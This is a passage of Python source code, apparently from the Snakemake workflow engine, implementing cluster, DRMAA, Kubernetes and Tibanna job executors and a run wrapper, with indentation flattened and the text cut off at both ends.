os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
latency_wait=3,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.wait(
active_job.jobid, drmaa.Session.TIMEOUT_NO_WAIT
)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
# job exited
os.remove(active_job.jobscript)
if (
not retval.wasAborted
and retval.hasExited
and retval.exitStatus == 0
):
active_job.callback(active_job.job)
else:
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
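# Illustrative usage (added for clarity, not part of the original module):
#
#     with change_working_directory("/tmp/shadow"):  # hypothetical shadow dir
#         subprocess.run("touch output.txt", shell=True)  # runs inside the shadow dir
#
# On exit, the previous working directory is restored; with no argument the
# context manager is a no-op.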
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait {latency_wait} --scheduler {workflow.scheduler_type} "
" --attempt {attempt} {use_threads} --max-inventory-time 0 "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
                # Some files are smaller than 1MB but grow larger after being
                # base64 encoded; we should exclude them as well, otherwise the
                # Kubernetes API will complain.
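                # (base64 encoding inflates data by roughly a factor of 4/3,
                # so any file larger than about 768 KiB, i.e. 3/4 of 1 MiB,
                # encodes past the limit even though its raw size is under 1MB.)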
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
    # In rare cases, deleting a pod may raise a 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
        # mount both the workdir emptyDir volume and the source secret volume
        container.volume_mounts = [
            kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir"),
            kubernetes.client.V1VolumeMount(name="source", mount_path="/source"),
        ]
body.spec = kubernetes.client.V1PodSpec(containers=[container])
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
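        # (e.g. a rule declaring resources: mem_mb=4096 would yield a memory
        # request of "4096M" next to the CPU request derived from its cores)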
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
            # Running in privileged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
    # This error doesn't mean anything is wrong with the k8s cluster, and users
    # can safely ignore it.
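    # Typical call pattern used throughout this class: the API call is wrapped
    # in a zero-argument callable so that it can be retried after
    # reauthentication, e.g.
    #     self._kubernetes_retry(lambda: self.kubeapi.read_namespaced_pod_status(...))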
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
            # Handle timeouts that may occur in case of a GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
                logger.info(
                    "Request timed out! Check your connection to the Kubernetes "
                    "master. The workflow will pause for 5 minutes to allow any "
                    "update operations to complete."
                )
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait 0 --scheduler {workflow.scheduler_type} "
"--attempt 1 {use_threads} --max-inventory-time 0 "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
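        # Example (hypothetical bucket and prefix): with default_remote_prefix
        # "mybucket/run1", remove_prefix("mybucket/run1/results/a.bam")
        # returns "results/a.bam".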
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
        # The local snakemake command here must be run with --default-remote-prefix
        # and --default-remote-provider (forced), but on the VM these options will
        # be removed. The snakemake run on the VM will consider these inputs and
        # outputs as not remote. The files are transferred to the container by
        # Tibanna before running snakemake. In short, the paths on the VM must be
        # consistent with what's in the Snakefile, but the actual location of the
        # files is the S3 bucket/prefix. This mapping info must be passed to Tibanna.
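        # For example (hypothetical names): with default_remote_prefix
        # "mybucket/run1", an output "mybucket/run1/results/a.txt" is mapped as
        #     file:///data1/snakemake/results/a.txt -> s3://mybucket/run1/results/a.txt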
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
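        # Tibanna's "mem" setting is in GB, hence the MB -> GB division
        # (e.g. mem_mb=4096 becomes mem=4); jobs without mem_mb default to 1 GB.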
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
open_browser=False,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow to use callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
conda_base_path,
basedir,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- list of input files
output -- list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
                    # Determine whether to benchmark this process or to do no
                    # benchmarking at all. We benchmark this process unless the
                    # execution is done through the ``shell:``, ``script:``, or
                    # ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
